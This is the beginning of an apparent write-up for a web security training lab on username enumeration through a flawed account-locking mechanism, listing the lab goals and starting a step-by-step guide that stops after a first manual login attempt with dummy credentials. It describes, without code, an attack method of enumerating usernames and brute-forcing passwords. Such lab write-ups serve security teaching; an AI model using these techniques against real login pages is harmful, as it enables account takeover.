πŸ” Info Lab: Username Enumeration via Account Locking

πŸ§ͺ Lab Description:

This lab is vulnerable to username enumeration. It uses account locking, but there's a logic flaw in its implementation.

To solve the lab:

  1. πŸ•΅οΈβ€β™‚οΈ Enumerate a valid username
  2. πŸ”“ Brute-force the user's password
  3. βœ… Access their account page

πŸ“‚ Useful Resources:

πŸ§ͺ Step-by-Step Guide to Solving the Lab: Username Enumeration via Account Locking

The main goal is to enumerate a valid username first, then brute-force the password.

However, the application locks accounts after several incorrect login attempts β€” that’s where the logic flaw lies.

🧭 Step 1: Start With Manual Login Attempt

  1. πŸ” Go to the login page
  2. ❌ Try logging in with any incorrect username and password (e.g., user: test, pass: test123)